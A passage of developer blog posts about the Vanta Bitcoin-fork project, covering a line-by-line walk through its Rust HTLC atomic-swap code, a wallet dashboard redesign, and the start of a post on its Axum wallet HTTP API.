Both of these updates landed *because the planning doc was a pull-out-the-options doc*, not a "here's the design" doc. Writing it forced the comparison.

## Further reading

- [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md) — the doc this post walks through
- [`vanta/vanta-swap`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-swap) — the HTLC implementation
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain
- [What's in vanta/papers](/blog/vanta_papers_design_doc_tour/) — the canonical-papers tour
- [Bisq's design overview](https://bisq.network/) — the existing implementation of "encrypted order book + on-chain settlement"
- [BIP 199 (HTLC)](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki) — the upstream pattern the swap script implements


---

# BIP-199 by hand: a code walk through vanta-swap

Canonical: https://blog.skill-issue.dev/blog/vanta_swap_htlc_walkthrough/
Description: A line-by-line tour of the Rust HTLC state machine that drives BTC ↔ VANTA atomic swaps. Redeem script bytes, the 2x/1x timelock dance, BIP143 sighash binding, and the witness layout that makes refund and claim routes provably distinct.
Published: 2026-04-13T22:22:23.000Z
Tags: vanta, atomic-swaps, htlc, bitcoin, bip-199, rust


import { Mermaid, RustPlayground, TradeoffTable, Aside } from "@/components/mdx";

The companion to [Private atomic swaps and the price-discovery problem](/blog/vanta_private_atomic_swaps/) is a piece of code, not a planning document. The chain-policy decisions about *how prices form* are upstream of [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md). The actual swap mechanics — the bytes that go on the wire, the script that locks the funds, the witness that unlocks them — live in [`vanta/vanta-swap`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-swap), which landed in commit [`149c1a41`](https://github.com/Dax911/vanta/commit/149c1a419) on 2026-04-13.

This post is a code walk. If you want the policy framing, read the other post first. If you want to understand what an HTLC actually *is* in 350 lines of Rust, you're in the right place.

<Aside kind="note">
The Vanta L1 implements the same Bitcoin Core script interpreter Bitcoin does. That means BIP-199 HTLCs are *bit-identical* on both chains. The same `htlc.rs` builds scripts that lock funds on either side of the swap.
</Aside>

## What [BIP-199](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki) is, in one paragraph

A hash time-locked contract is a Bitcoin output that pays whoever can produce one of two things:

1. The preimage of a public hash (the *claim* path), or
2. The original funder's signature, but only after a block-height locktime has passed (the *refund* path).

That's a four-line redeem script. The protocol around it — generating the secret, picking timelocks, broadcasting in the right order, watching the chain for the preimage reveal — is the [BIP-199 atomic-swap state machine](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki). Two parties construct two HTLCs, one on each chain, with the *same* hash and *opposite-asymmetric* timelocks. Either both legs settle or both legs refund. There is no third outcome.

## The timelock math

The whole thing rests on a piece of arithmetic that is one inequality:

$$
t_{\text{now}} < t_{1} < t_{2}
$$

where $t_2$ is the initiator's locktime (longer) and $t_1$ is the participant's locktime (shorter, conventionally $t_1 = t_2 / 2$). The initiator commits *first*, with the longer timelock. The participant matches with a shorter timelock. When the initiator claims the participant's HTLC (revealing the preimage), the participant has at least $t_1$ left to use that preimage on the initiator's HTLC. If the participant disappears, the initiator waits $t_2$ blocks and refunds. If the initiator disappears, the participant waits $t_1$ and refunds.

The asymmetry matters. If the timelocks were equal, a malicious initiator could refund their own HTLC seconds before the participant claims, racing the participant for one of the funds. The 2x/1x ratio gives the participant a $t_1$-block buffer to react to the preimage reveal.

In Vanta's CLI this shows up as a `--timelock` flag on `initiate` and a derived value the participant uses, printed as a hint by [`main.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/main.rs):

```
The participant should use timelock = {timelock / 2} (half of yours).
```

Half. Not "your locktime minus epsilon." Half. Because the participant has to pick a value that gives the initiator enough time to claim *and* leaves the participant a meaningful refund window if the initiator vanishes.

## The state machine

Four parties, four states.

<Mermaid chart={`stateDiagram-v2
  [*] --> Created: initiator generates secret + hash
  Created --> Funded_I: initiator broadcasts HTLC on chain A (locktime t2)
  Funded_I --> Funded_P: participant broadcasts HTLC on chain B (locktime t1)
  Funded_P --> Claimed_P: initiator reveals preimage, claims chain B
  Claimed_P --> Claimed_I: participant uses revealed preimage on chain A
  Claimed_I --> [*]: swap complete

  Funded_I --> Refunded_I: t2 expired, no participant
  Funded_P --> Refunded_P: t1 expired, initiator never claimed
  Refunded_I --> [*]: aborted before participant
  Refunded_P --> [*]: aborted after participant`}/>

The two refund paths are the *only* way the swap fails partially. Either both sides claim — atomic — or both sides refund — atomic. The mid-swap state where exactly one side has settled is unreachable, because the act of claiming chain B *publishes* the preimage on chain B, and chain A's HTLC reads the same preimage. (We'll come back to this.)

The Rust enum that mirrors this is in [`swap.rs:48`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs):

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub enum SwapStatus {
    Created,
    Funded,
    Claimed,
    Refunded,
}
```

Note: there's no `Aborted` or `Failed`. A swap that goes wrong refunds. There is no sad-path state.

## The redeem script, byte by byte

Quoting [`htlc.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs):

```
OP_IF
  OP_SHA256 <hash> OP_EQUALVERIFY <receiver_pubkey> OP_CHECKSIG
OP_ELSE
  <locktime> OP_CHECKLOCKTIMEVERIFY OP_DROP <sender_pubkey> OP_CHECKSIG
OP_ENDIF
```

The `IF` branch is the *claim* path. To take it, the spender pushes:

1. A signature over the spending transaction
2. A 32-byte preimage
3. `0x01` (OP_TRUE — selects the IF branch)
4. The redeem script itself (this is the P2WSH witness convention)

The script then runs: pop `0x01` (truthy → enter IF), `OP_SHA256` the preimage, compare against the embedded `<hash>`, `OP_EQUALVERIFY` (fail if not equal), then `<receiver_pubkey> OP_CHECKSIG` against the signature.

The `ELSE` branch is the *refund* path:

1. A signature
2. The empty byte string (OP_FALSE — selects the ELSE branch)
3. The redeem script

`<locktime> OP_CHECKLOCKTIMEVERIFY OP_DROP` is the BIP-65 incantation: pull `nLockTime` from the spending tx, compare against `<locktime>`, fail if too early. Then `<sender_pubkey> OP_CHECKSIG`.

The Rust that builds this lives in `redeem_script(&self) -> Vec<u8>`. It hand-emits opcodes. Worth quoting — there's no "script library" here, just a `Vec<u8>` that gets pushed on:

<RustPlayground edition="2021" mode="debug" title="HTLC redeem script construction">
{`// Simplified excerpt from vanta-swap/src/htlc.rs.
// Hand-emitted Bitcoin script — no abstraction layer.

mod op {
    pub const OP_IF: u8 = 0x63;
    pub const OP_ELSE: u8 = 0x67;
    pub const OP_ENDIF: u8 = 0x68;
    pub const OP_DROP: u8 = 0x75;
    pub const OP_SHA256: u8 = 0xa8;
    pub const OP_EQUALVERIFY: u8 = 0x88;
    pub const OP_CHECKSIG: u8 = 0xac;
    pub const OP_CHECKLOCKTIMEVERIFY: u8 = 0xb1;
}

fn build_redeem(
    hash: [u8; 32],
    receiver_pubkey: &[u8],
    sender_pubkey: &[u8],
    locktime: u32,
) -> Vec<u8> {
    let mut s = Vec::with_capacity(128);

    s.push(op::OP_IF);
    s.push(op::OP_SHA256);
    s.push(0x20);                     // push 32 bytes
    s.extend_from_slice(&hash);
    s.push(op::OP_EQUALVERIFY);
    s.push(receiver_pubkey.len() as u8);
    s.extend_from_slice(receiver_pubkey);
    s.push(op::OP_CHECKSIG);

    s.push(op::OP_ELSE);
    let lt = encode_script_number(locktime as i64);
    s.push(lt.len() as u8);
    s.extend_from_slice(&lt);
    s.push(op::OP_CHECKLOCKTIMEVERIFY);
    s.push(op::OP_DROP);
    s.push(sender_pubkey.len() as u8);
    s.extend_from_slice(sender_pubkey);
    s.push(op::OP_CHECKSIG);

    s.push(op::OP_ENDIF);
    s
}

fn encode_script_number(n: i64) -> Vec<u8> {
    if n == 0 { return vec![]; }
    let mut absn = n.unsigned_abs();
    let mut r = Vec::new();
    while absn > 0 { r.push((absn & 0xff) as u8); absn >>= 8; }
    if r.last().unwrap() & 0x80 != 0 { r.push(0x00); }
    r
}

fn main() {
    let hash = [0xaa; 32];
    let recv = [0x02; 33];
    let send = [0x03; 33];
    let script = build_redeem(hash, &recv, &send, 144);
    println!("redeem script len = {} bytes", script.len());
    println!("first opcode = 0x{:02x} (OP_IF)", script[0]);
    println!("second opcode = 0x{:02x} (OP_SHA256)", script[1]);
    println!("last opcode = 0x{:02x} (OP_ENDIF)", script.last().unwrap());
}
`}
</RustPlayground>

The output is a fixed-shape ~110-byte script depending on locktime encoding. The P2WSH wrapper is the `OP_0 <32-byte sha256(redeem)>` two-byte-then-pushdata encoding that makes the *witness program* — the thing the network sees — a 34-byte commitment to the script's hash.

`p2wsh_script()` in `htlc.rs` does the wrap:

```rust
pub fn p2wsh_script(&self) -> Vec<u8> {
    let redeem = self.redeem_script();
    let hash = sha256(&redeem);
    let mut script = Vec::with_capacity(34);
    script.push(op::OP_0);
    script.push(0x20); // push 32 bytes
    script.extend_from_slice(&hash);
    script
}
```

The `assert_eq!(p2wsh.len(), 34)` test in [`htlc.rs:198`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs) is the safety net for that: anyone reading the test sees the constant the wire format depends on.

## Why P2WSH and not Taproot

Worth a brief note. Taproot is the cool kid in 2026, and a Schnorr-key-aggregation atomic swap could in principle use a single-key-path-spend that looks indistinguishable from a normal transfer. But:

<TradeoffTable
  caption="Why P2WSH legacy script for v1 of vanta-swap"
  rows={[
    {
      option: "P2WSH (current)",
      cost: "~110 byte redeem script + 34 byte scriptPubKey",
      latency: "Standard segwit verification path",
      blast_radius: "Any segwit node, any wallet, BIP-199 standard",
      notes: "Boring. Audited. Works on every Bitcoin Core fork."
    },
    {
      option: "Taproot key-aggregation (MuSig2)",
      cost: "Single 32-byte x-only key on-chain — privacy win",
      latency: "Slightly cheaper to verify",
      blast_radius: "Requires MuSig2 on both ends; smaller wallet surface in 2026",
      notes: "On the roadmap for v2 once both ends ship Taproot wallets."
    },
    {
      option: "Taproot script-path",
      cost: "Two leaf scripts (claim + refund)",
      latency: "Still BIP-65 path on refund",
      blast_radius: "Slightly better privacy than P2WSH; not key-path so still distinguishable",
      notes: "Not a meaningful upgrade over P2WSH for this use case."
    },
  ]}
/>

The simplest thing that could work is P2WSH. v1 ships P2WSH. The Taproot-key-path version is the v2 conversation, which I expect to come up the same time the shielded-VANTA-leg work lands.

## The sighash dance

This is the part of HTLC code that's easy to get wrong and impossible to debug when you do. The witness script is sighashed differently in segwit than in legacy, and the spending side has to compute the *exact* same sighash the verifier will check.

The relevant code is in [`swap.rs:215`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs):

```rust
// Sign: BIP143 sighash over the witness program (the redeem script)
let redeem_script = state.contract.redeem_script();
let witness_script = ScriptBuf::from_bytes(redeem_script.clone());
let privkey = PrivateKey::from_wif(privkey_wif).context("invalid WIF private key")?;
let secp = Secp256k1::new();

let mut sighash_cache = SighashCache::new(&spending_tx);
let sighash = sighash_cache
    .p2wsh_signature_hash(0, &witness_script, Amount::from_sat(htlc_value), EcdsaSighashType::All)
    .context("sighash computation failed")?;

let msg = secp256k1::Message::from_digest(sighash.to_byte_array());
let sig = secp.sign_ecdsa(&msg, &privkey.inner);

// DER-encode signature + sighash type byte
let mut sig_bytes = sig.serialize_der().to_vec();
sig_bytes.push(EcdsaSighashType::All as u8);
```

Three things to notice:

**`p2wsh_signature_hash`, not `legacy_signature_hash`.** This is BIP143 — the segwit sighash. It hashes the input value as part of the sighash so a signature that's valid for "spend X satoshis" can never be replayed for "spend Y satoshis." A legacy sighash doesn't include the value, which is why pre-segwit malleable signatures were a thing.

**`Amount::from_sat(htlc_value)`.** The funding amount has to be exact. Off by one satoshi and the sighash mismatches, the signature is rejected, and the broadcast fails with a generic `mandatory-script-verify-flag-failed` from `bitcoind`. Welcome to the worst error message in cryptocurrency.

**`EcdsaSighashType::All`** — the standard "sign every input and every output." The only time you'd want a different sighash type for an HTLC is if you wanted partial-input flexibility, which atomic swaps don't.

The Rust [`bitcoin` crate](https://docs.rs/bitcoin/0.32) ships `SighashCache`, which precomputes the parts of the sighash that don't change per-input (the input/output digests) so you can sign multiple inputs without redoing the hash. We have one input, so the cache is trivial — but the API is the same and the per-input computation is correct.

## Witness layout: claim vs. refund

The two witnesses look almost identical and they have to be carefully different. Both are stacks; the bottom of the stack is the redeem script, and what's above it controls which branch runs.

Claim witness, from `claim_witness` in [`htlc.rs:97`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs):

```rust
pub fn claim_witness(&self, signature: &[u8], preimage: &[u8; 32]) -> Vec<Vec<u8>> {
    vec![
        signature.to_vec(),
        preimage.to_vec(),
        vec![0x01], // OP_TRUE — take the IF branch
        self.redeem_script(),
    ]
}
```

Four items. Bottom-to-top of stack: redeem script, OP_TRUE, preimage, signature. After the `OP_PUSHDATA` consumes the script reveal, execution begins at OP_IF. The next pop is `0x01` → truthy → take the IF branch. The IF branch consumes the preimage with OP_SHA256, compares against the embedded hash via OP_EQUALVERIFY, and then the receiver pubkey + CHECKSIG consumes the signature.

Refund witness, from `refund_witness` in `htlc.rs:107`:

```rust
pub fn refund_witness(&self, signature: &[u8]) -> Vec<Vec<u8>> {
    vec![
        signature.to_vec(),
        vec![], // empty — take the ELSE branch
        self.redeem_script(),
    ]
}
```

Three items: redeem script, *empty bytes* (which Bitcoin script interprets as OP_FALSE), signature. OP_IF pops the empty bytes → falsy → take ELSE. The ELSE branch checks `<locktime> OP_CHECKLOCKTIMEVERIFY` against the spending transaction's `nLockTime`, drops the locktime, then verifies the sender's signature.

Two failure modes are interesting:

**Claim with the wrong preimage.** OP_SHA256 hashes whatever you push. OP_EQUALVERIFY fails. The script aborts with a verification error. The transaction is rejected. The HTLC is still spendable.

**Refund before locktime expires.** OP_CHECKLOCKTIMEVERIFY pulls `nLockTime` from the spending transaction. If it's less than the embedded locktime, the script aborts. The Rust code in [`swap.rs:266`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs) preflights this check before broadcast:

```rust
let current_height = rpc::get_block_height(&client)?;
if current_height < state.contract.locktime as u64 {
    anyhow::bail!(
        "Locktime not reached: current height {} < locktime {}. Wait {} more blocks.",
        current_height, state.contract.locktime,
        state.contract.locktime as u64 - current_height,
    );
}
```

You could just let the broadcast fail. Better UX is to refuse to construct the transaction in the first place.

## Why the preimage reveal is atomic

Worth dwelling on this because it's the part of HTLC theory that students always blink at. If Alice claims Bob's HTLC by revealing `s`, why does that make Bob's claim of Alice's HTLC inevitable?

Because the preimage `s` is now on Chain B's mempool/blockchain in plaintext. Any node, any explorer, any indexer running on Chain B can extract `s` from the witness stack of Alice's claim transaction. Bob's wallet polls Chain B for the spending of his HTLC, finds `s`, and now has the secret needed to spend Alice's HTLC on Chain A.

The "atomic" property is that revealing `s` to Chain B is *necessarily* publishing it. There is no way to construct a P2WSH spend that hides the witness data — the witness stack is part of the transaction, the transaction is part of the block, the block is gossiped to the network. By the time Alice's claim is mined, Bob already knows.

If Alice never claims (refund path), `s` is never revealed. After $t_1$ blocks, Bob refunds his HTLC. After $t_2$ blocks, Alice refunds hers. Both got their original funds back. No third outcome.

The math: the only way the swap settles partially is if Alice claims chain B and then *somehow* prevents Bob from claiming chain A within the window $t_2 - t_1$. The 2x/1x ratio is what makes that window large enough that Bob's ordinary chain-watching software can detect, parse, and broadcast inside it.

## What the wallet doesn't do (yet)

A fully shielded VANTA leg — where the HTLC's *amount* is hidden — is the missing piece. Today, the value of the P2WSH output on the VANTA chain is plaintext, exactly as it is on Bitcoin's. From [the price-discovery post](/blog/vanta_private_atomic_swaps/):

> the current swap implementation is fully transparent on both sides

The plan, gestured at in [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md), is to replace the P2WSH output on the VANTA leg with a witness v2 commitment whose amount is hidden behind a Pedersen blinding. The HTLC pubkey path becomes a shielded-pool note; the claim/refund logic becomes a ZK proof of pubkey ownership + preimage knowledge, instead of a script-level CHECKSIG. Same atomic property; different cryptographic primitive.

That work is real, and it's not in the current `vanta-swap`. The `vanta-swap` we have today is the simplest thing that could possibly work, in 350 lines of Rust, with the same script semantics on both chains. The shielded version is a different post.

## What I changed my mind about

The first version of `htlc.rs` used the `bitcoin::ScriptBuf::builder()` API — the abstraction-layer way of constructing a Bitcoin script. It was 30% shorter and 100% less debuggable. When the OP_CHECKLOCKTIMEVERIFY encoding was wrong (script-number encoding for negative numbers and 128 has a sign-bit edge case the builder API didn't trigger), I had to rewrite half of it as raw byte pushes anyway to instrument the failure.

The version that ships is the boring `Vec<u8>` with explicit opcode pushes. Every byte is visible. When something doesn't verify, I read the script in a hex dumper and spot the wrong byte. That's a lower abstraction level than I'd ordinarily reach for, but BIP-199 *is* a wire format, and wire formats want to be visible.

The script-number encoding bug was specifically `encode_script_number(128)` returning `[0x80]` (which Bitcoin script interprets as `-0`) instead of `[0x80, 0x00]` (which encodes positive 128). The test in [`htlc.rs:236`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs) is the regression catch:

```rust
assert_eq!(encode_script_number(128), vec![0x80u8, 0x00]);
```

I'd estimate I'd have caught that bug six hours faster if I'd been building the script as bytes from the start.

## Further reading

- [`vanta/vanta-swap/src/htlc.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs) — script construction + witness builder + tests
- [`vanta/vanta-swap/src/swap.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs) — initiate / participate / claim / refund state machine
- [`vanta/vanta-swap/src/main.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/main.rs) — CLI surface and the timelock-halving hint
- [BIP-199](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki) — the upstream HTLC pattern
- [BIP-143](https://github.com/bitcoin/bips/blob/master/bip-0143.mediawiki) — segwit sighash, the BIP this signing path implements
- [Private atomic swaps and the price-discovery problem](/blog/vanta_private_atomic_swaps/) — the policy framing the implementation rides on
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain doing the verification


---

# The unified dashboard: collapsing private and transparent into one wallet view

Canonical: https://blog.skill-issue.dev/blog/vanta_unified_dashboard_wallet_ui/
Description: Two pages — one for private balance, one for transparent — taught users to think in two heads. The 2026-04-17 commit folded them. The wallet now shows one balance, one feed, with the privacy boundary inside the data, not the URL.
Published: 2026-04-17T05:52:57.000Z
Tags: vanta, wallet-ui, react, design, ux, privacy


The 2026-04-17 commit message — `wallet-ui: merge privacy view into unified dashboard + rescan endpoint` — is one of the smallest functional commits in the Vanta repo and one of the most consequential UX decisions. Up to that point the wallet had a `/dashboard` page (transparent UTXOs) and a separate `/privacy` page (shielded notes). Two pages. Two balance numbers. Two transaction feeds. Users — including, embarrassingly, me — would forget which page they were on and wonder why a transaction "didn't arrive" when it had simply landed on the other page.

The fix was to collapse them. This post is about why that decision matters more than it looks, what the new layout does, and the discipline a privacy chain needs to keep when it ships a wallet.

## Why two pages was wrong

The original split came from a literal reading of the architecture. The chain has a transparent layer (the L1 UTXO set) and a privacy layer (the L2 SMT of commitments). The wallet had two stores backing two pages. Easy mental model for a developer.

For a user, this is the wrong frame. A user has *money*, and the money is *in different states*. Transparent and shielded are states the money happens to be in, like "in checking" vs "in savings." A bank doesn't make you flip between two browser tabs for those. The user thinks "what's my balance" and "what came in lately" — not "let me check my transparent feed *and* my shielded feed."

Worse, two pages teaches people that the privacy/transparent boundary is something they have to think about. It is — sometimes. But mostly the wallet should *handle the boundary* and present *the actual account*. The boundary should be visible *inside the data* (each note or UTXO has a privacy badge), not in the URL.

## What the unified dashboard does

The new [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx) is the page. The structure is roughly:

1. **One balance**, prominently — labelled "Private Balance" because that's what 99% of the value should be once the chain is mature, with the small print being "X VANTA transparent" if the user has any.
2. **L2 status card** — SMT root, commitment count, nullifier count, last block height. Auto-refreshing every 5 seconds. This is the chain's privacy view, surfaced *as a number on the dashboard*, not hidden in a settings page.
3. **Quick actions** — send, receive, sync.
4. **One activity feed** — interleaving transparent transactions and shielded notes by timestamp. Each row has a privacy badge (`ShieldCheck` icon for shielded, `EyeOff` for transparent) and the badge is *the* indicator of which state the value is in.

The L2 status card auto-fetches on a `setInterval`:

```tsx
useEffect(() => {
  fetchL2Status()
  const id = setInterval(fetchL2Status, 5000)
  return () => clearInterval(id)
}, [])
```

5 seconds is a deliberate cadence. The chain produces blocks every 60 seconds. SMT root updates land at most once per block, on average. 5 seconds gives the user a perception of "this is live" without hammering the L2 sidecar's REST endpoint.

## The rescan endpoint

The other piece of the commit is a `/api/sync` endpoint (and the matching `sync()` action in the Zustand store) that triggers a re-scan of L1 + L2 against the wallet's keys. The rescan reads:

- the L1 transparent UTXOs the wallet's addresses control
- the L2 encrypted-note inbox, trial-decrypting against the wallet's secret to find shielded notes addressed to it

Before this endpoint, "my balance is wrong" was an unrecoverable error state — the user would have to restart the wallet. With the rescan endpoint, "my balance is wrong" is a button click. The button reports `{ newNotes, scannedToIndex, balance, unspentCount }` so the user sees something concrete: *"found 2 new notes."*

This is the kind of feature that's invisible until you don't have it, at which point support tickets stack up. Shipping it alongside the unified dashboard was the right pairing — the dashboard makes the user expect their balance to be live; the rescan endpoint backstops them when it isn't.

## The badge discipline

The activity feed shows transparent and shielded events together. Each row gets a privacy badge:

- `ShieldCheck` (purple) — shielded transaction
- `EyeOff` (purple) — incoming shielded note
- `Hash` — transparent transaction
- `Layers` — L2-only event (commitment landed but not yet associated with a wallet note)

The colour discipline is consistent across the wallet: purple is the privacy-feature colour, used for L2 elements and shielded states. Transparent elements use the default text colour. The viewer doesn't have to read a label to know which is which.

This is small. It also took longer than I expected to settle on. Earlier drafts had transparent transactions in green and shielded in purple, on the theory that "green = good, purple = brand colour." That backfired immediately — green coded as "fine, no need to look closer" and purple as "interesting, look closer," when on Vanta the desired hierarchy is the opposite (privacy is the default, transparent is the exception).

The current discipline: **shielded is the unmarked default; transparent is *marked* by being non-shielded.** A row without a special badge isn't transparent; it's shielded. A row with a transparent badge is the exception. Visual weight matches the expected long-run distribution.

## Why this is hard

Privacy-coin wallets have shipped with two-pane "shielded vs transparent" UX for years, and it's mostly *not* their fault. The frame leaks from the chain when the chain treats shielded as a separate pool. On Zcash, you literally have shielded addresses (`zs1...`) and transparent addresses (`t1...`) — two different address families — and a wallet has to render that.

Vanta dodges that frame because the chain treats commitments and UTXOs as two states of the same value, with a single address family (`vnt1...`) on top. That gives the wallet *room* to present a unified view. The wallet has to *take* the room, which is the part the dashboard collapse is doing.

The principle: **the wallet's frame should match the chain's frame, not the wallet's data model.** The data model has commitments and UTXOs and an L2 sidecar and an L1 RPC. The frame the user sees should be "money in, money out, what's it doing." The data model is the wallet's problem.

## What I'd ship next

Three things on the list, in priority order.

1. **Per-note privacy decay indicator.** Coinbase rewards land transparent for one confirmation before they private-decay (the "fast privacy decay" pattern in [`papers/01-executive-summary.md`](https://github.com/Dax911/vanta/blob/main/papers/01-executive-summary.md)). The wallet should show, on each row, *whether* a note is in its decay window. If it is, the user gets a "wait one block before spending" hint. Today the wallet doesn't surface this — a power-user can read it from the L2 status, but no normal user will.
2. **"Send" with no privacy choice.** The send flow today asks "transparent or private?" — even though the answer is *almost always* private. Make private the default; offer a "transparent send" advanced option behind a disclosure. Most users will never need to know transparent sends exist.
3. **Address book scoped to the wallet.** Privacy-respecting wallets often skip address books because of the linkability concern. Vanta can do this *in the wallet*, since the wallet is the only thing that knows which addresses the user has interacted with. Address book entries don't leak to the chain. This was the user-facing thing missing the longest.

The dashboard collapse is the foundation; these are the next-step UX wins it enables.

## The architectural lesson

The dashboard refactor is small but it's an example of the larger principle that runs through the whole wallet: **the privacy boundary is in the data, not the URL.** Two URLs implies two domains of knowledge a user has to manage. One URL, with private/transparent as a property of each row, implies *the wallet manages this and presents one cohesive thing.*

I want this principle to extend. The settings page shouldn't have a "privacy" tab. The send flow shouldn't have a "privacy" toggle as a primary control. The receive page shouldn't ask the user to choose between a shielded and a transparent address. Privacy is the default; transparent is the exception; everything else is the wallet's job to handle.

Some of those changes are shipped. Some are on the list. The dashboard collapse was the one that mattered most because it landed first and it set the discipline for everything else.

## Further reading

- [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx) — the unified dashboard
- [`wallet-ui/src/pages/privacy.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/privacy.tsx) — the old privacy view (kept for a while as a deep-dive page)
- [`wallet-ui/src/stores/privacy-store.ts`](https://github.com/Dax911/vanta/tree/main/wallet-ui/src/stores) — the Zustand store the dashboard pulls from
- [The vanta wallet HTTP API](/blog/vanta_wallet_axum_api/) — the L1 service the dashboard calls
- [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — the L2 service the dashboard calls
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — where this dashboard ends up living for end users


---

# The vanta wallet HTTP API: an Axum bridge to vantad RPC

Canonical: https://blog.skill-issue.dev/blog/vanta_wallet_axum_api/
Description: Before the Tauri desktop wallet there was an Axum web wallet. It is a five-route Rust service that wraps vantad's JSON-RPC and serves a single static page. Boring on purpose — and the boring is the point.
Published: 2026-04-13T18:46:45.000Z
Tags: vanta, rust, axum, wallet, api, rpc


The first wallet I shipped for Vanta wasn't a desktop app. It was a [Rust/Axum HTTP service](https://github.com/Dax911/vanta/tree/main/wallet) that wraps `vantad`'s JSON-RPC behind a small REST API and serves a single static HTML page. Five routes, one `Cargo.toml`, one `main.rs`, ~250 lines of Rust. Boring on purpose. The boring is the point — when you're bringing up an L1, the wallet has to be a tool you can debug inside of, not a black box.

This post is a read-along of [`wallet/src/main.rs`](https://github.com/Dax911/vanta/blob/main/wallet/src/main.rs), what the route surface buys you, what's coming next as the desktop app picks up the unified-dashboard work, and what the Axum service is *not* (it's not a key holder; it's a thin bridge).

## The dependency tree

The whole [`Cargo.toml`](https://github.com/Dax911/vanta/blob/main/wallet/Cargo.toml) fits in a screenshot:

```toml
[dependencies]
bitcoin = { version = "0.32", features = ["serde", "rand-std"] }
bitcoincore-rpc = "0.19"
axum = { version = "0.7", features = ["macros"] }
tokio = { version = "1", features = ["full"] }
tower-http = { version = "0.6", features = ["cors", "fs"] }
serde = { version = "1", features = ["derive"] }
serde_json = "1"
anyhow = "1"
```

That's it. Axum for routing, `bitcoincore-rpc` for the typed RPC client (which works against `vantad` because the RPC contract is unchanged from Bitcoin Core v27.0), `bitcoin` for address parsing, `tower-http` for CORS and static-file serving. No database, no auth middleware, no template engine, no ORM. The wallet is a pass-through — the only real state is *whatever* `vantad` says.

This is the choice I want to be loudest about. The temptation when you're forking Bitcoin is to ship a wallet that re-implements everything `vantad` already does. Don't. The wallet's job is *to make `vantad` legible from a browser.*

## The route surface

Five HTTP endpoints, registered in `main()` with the canonical Axum router:

```rust
let app = Router::new()
    .route("/", get(index))
    .route("/api/info", get(get_info))
    .route("/api/transactions", get(get_transactions))
    .route("/api/blocks", get(get_recent_blocks))
    .route("/api/send", post(send_zer))
    .route("/api/address/new", post(new_address))
    .layer(CorsLayer::permissive())
    .with_state(state);
```

Each route maps to one or two RPCs. Walking through them:

**`GET /` — the index.** This serves the static HTML+JS page bundled into the binary at compile time via `include_str!("../static/index.html")`. The page calls the four JSON endpoints below. Compile-time bundling is a one-binary deploy story: copy `vanta-wallet`, run it, the UI is *there*.

**`GET /api/info` — wallet + network status.** Five RPCs in one handler:

```rust
let balance = rpc.get_balance(None, None).unwrap_or_default();
let unconfirmed = rpc.get_balances().map(|b| b.mine.untrusted_pending).unwrap_or_default();
let block_count = rpc.get_block_count().unwrap_or(0);
let info = rpc.get_network_info().ok();
let mining = rpc.get_mining_info().ok();
```

Returns `WalletInfo { balance, unconfirmed_balance, block_count, connections, mining_address, difficulty }`. This is the polled-every-5-seconds heartbeat the index page uses.

**`GET /api/transactions` — last 50.** A direct passthrough to `listtransactions`, with a small Rust struct mapping over the result so the JSON the browser sees is stable across `bitcoincore-rpc` upgrades.

**`GET /api/blocks` — recent 10 blocks.** Walks `(height-10..=height)`, calls `getblockhash` and `getblockinfo` for each, returns a `Vec<BlockInfo>`. The single-RPC-per-block makes this O(n) but n is 10, so it's fine.

**`POST /api/send` — send VANTA.** Takes `{ address, amount }`, parses the address against the network (so `Z`-legacy and `vnt1`-bech32 both work), constructs an `Amount` from the float, and calls `send_to_address`. Errors are wrapped with `BAD_REQUEST` for parse failures and `INTERNAL_SERVER_ERROR` for RPC failures.

**`POST /api/address/new` — fresh receiving address.** Calls `getnewaddress` with an optional label.

That's the entire surface. There is intentionally no `wallet/create`, no key-import, no PSBT signing. Those operations go through `vanta-cli` directly — the wallet user is implicitly a `vantad` user. This is fine for the testnet phase. It is *not* fine for shipping to the public, which is why the desktop app exists.

## The settxfee dance

One detail in the `main()` startup that took me longer than it should have:

```rust
let _ = rpc.call::<serde_json::Value>("settxfee", &[serde_json::json!(0.0001)]);
```

Bitcoin Core's fee estimator uses historical mempool data to predict the fee per byte. On a fresh chain with low traffic, it has no data. The default behaviour when the estimator can't decide is to error on `sendrawtransaction` — *not* to fall back to a default. You discover this the first time you try to send a tx on a fresh chain and get back "fee estimation failed."

The fix is `settxfee` at startup with a sane fallback. `0.0001 VANTA/kB` is roughly nothing in real terms (one ten-thousandth of a unit, when each block pays out 100,000 units), but it's enough to satisfy the estimator's "have a fee" check. Same trick is in `txbot/src/main.rs` for the same reason.

